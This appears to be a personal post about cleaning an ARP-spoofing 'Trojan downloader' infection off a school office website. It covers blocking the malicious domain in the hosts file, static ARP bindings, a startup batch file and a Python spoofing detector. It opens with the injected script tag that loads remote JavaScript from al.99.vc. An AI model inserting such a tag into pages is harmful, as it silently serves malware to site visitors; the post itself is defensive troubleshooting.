<script src=http://al.99.vc/1.js></script>
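Recently the Academic Affairs Office website has intermittently been hit by a virus that injects this code. Sometimes a reboot resolves the problem; sometimes after a reboot an IP address conflict is reported.
After investigation, it appears to be the "Trojan downloader" type of ARP virus. A combination of an ARP firewall, Windows 清理助手 (Windows Cleanup Assistant), 安全卫士 (Security Guard) and the latest version of Rising (瑞星) should be able to deal with it. The teacher in charge has already been notified to update the antivirus software and take care of it.
Temporary workaround:
Edit the hosts file under C:\WINDOWS\system32\drivers\etc on the system drive (open it with Notepad) and add 127.0.0.1 al.99.vc to block the site.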
The detailed usage of the ARP command is as follows:
arp /?

Displays and modifies the IP-to-Physical address translation tables used by
address resolution protocol (ARP).

ARP -s inet_addr eth_addr [if_addr]
ARP -d inet_addr [if_addr]
ARP -a [inet_addr] [-N if_addr]

  -a            Displays current ARP entries by interrogating the current
                protocol data. If inet_addr is specified, the IP and Physical
                addresses for only the specified computer are displayed. If
                more than one network interface uses ARP, entries for each ARP
                table are displayed.
  -g            Same as -a.
  inet_addr     Specifies an internet address.
  -N if_addr    Displays the ARP entries for the network interface specified
                by if_addr.
  -d            Deletes the host specified by inet_addr. inet_addr may be
                wildcarded with * to delete all hosts.
  -s            Adds the host and associates the Internet address inet_addr
                with the Physical address eth_addr. The Physical address is
                given as 6 hexadecimal bytes separated by hyphens. The entry
                is permanent.
  eth_addr      Specifies a physical address.
  if_addr       If present, this specifies the Internet address of the
                interface whose address translation table should be modified.
                If not present, the first applicable interface will be used.
Example:
  > arp -s 157.55.85.212 00-aa-00-62-c6-09  .... Adds a static entry.
  > arp -a                                  .... Displays the arp table.
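Here arp -a is used to view the table. I checked, and it does indeed show the current IP bound to the upstream router's address. If it shows all zeros at this point, something has definitely gone wrong. You need to use arp -d to clear the entry and then rebind the correct one.
You can use ARP -S to create the binding, but after a reboot it may no longer be in effect. So you need to create a batch file and put it in the Startup folder: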
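@echo off
rem Clear the ARP cache, then pin the gateway IP to its real MAC address.
arp -d
rem Replace GATEWAY_IP and GATEWAY_MAC with the gateway's actual values.
arp -s GATEWAY_IP GATEWAY_MAC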
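The manual check described above (a gateway entry in arp -a that is all zeros or no longer matches the real router) can be automated. The following Python is an added example, not part of the original post; it assumes English-language arp -a output, and the gateway IP, the MAC addresses and the sample table are constructed.

```python
import re
from collections import defaultdict

# One row of Windows `arp -a` output: IP, hyphen-separated MAC, entry type.
ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+((?:[0-9a-f]{2}-){5}[0-9a-f]{2})\s+(\w+)", re.I)
ZERO = "00-00-00-00-00-00"
NON_HOST = ("ff-ff-ff-ff-ff-ff", "01-00-5e", "33-33")  # broadcast / multicast

def parse_arp_table(text):
    """Return {ip: (mac, type)} from the text printed by `arp -a`."""
    rows = (ROW.match(line) for line in text.splitlines())
    return {m.group(1): (m.group(2).lower(), m.group(3).lower()) for m in rows if m}

def check_gateway(text, gateway_ip, expected_mac):
    """List findings that suggest the gateway entry has been tampered with."""
    table, findings = parse_arp_table(text), []
    mac, kind = table.get(gateway_ip, (None, None))
    if mac is None:
        findings.append("gateway has no ARP entry")
    elif mac == ZERO:
        findings.append("gateway MAC is all zeros")
    elif mac != expected_mac.lower():
        findings.append(f"gateway MAC is {mac}, expected {expected_mac.lower()}")
    if mac is not None and kind != "static":
        findings.append("gateway entry is not static")
    # One MAC answering for several IPs: that host may be impersonating the others.
    by_mac = defaultdict(list)
    for ip, (m, _) in table.items():
        if m != ZERO and not m.startswith(NON_HOST):
            by_mac[m].append(ip)
    for m, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(f"{m} is claimed by {', '.join(sorted(ips))}")
    return findings

# Constructed sample output (addresses and MACs are made up for illustration).
SAMPLE = """
Interface: 192.168.1.10 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-66     dynamic
  192.168.1.23          00-11-22-33-44-66     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
"""

if __name__ == "__main__":
    print("\n".join(check_gateway(SAMPLE, "192.168.1.1", "00-11-22-33-44-55")))
```

Feed it the captured text of arp -a together with the gateway MAC recorded while the network was known to be clean; an empty list means the static binding is in place and matches.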
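When helping to maintain the website, the system contains too much clutter, and it is not convenient to reinstall and reconfigure it, so I can only do some simple maintenance, assistance and guidance work. It does not seem very effective, and sometimes it is really frustrating.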